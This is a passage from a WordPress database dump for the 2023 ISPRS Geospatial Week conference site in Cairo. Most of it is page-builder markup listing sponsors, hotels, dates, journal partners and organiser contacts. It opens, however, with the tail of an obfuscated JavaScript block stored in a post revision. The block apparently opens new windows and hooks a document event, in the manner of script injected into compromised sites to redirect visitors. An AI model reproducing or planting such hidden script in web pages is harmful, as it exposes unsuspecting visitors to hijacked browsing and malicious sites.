_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:31:18','2023-08-15 23:31:18','',3066,'https://gsw2023.com/?p=5224',0,'revision','',0),
(5225,1,'2023-08-15 23:38:21','2023-08-15 23:38:21','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>\r\n\r\n&nbsp;\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731843{margin-top: -15px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" 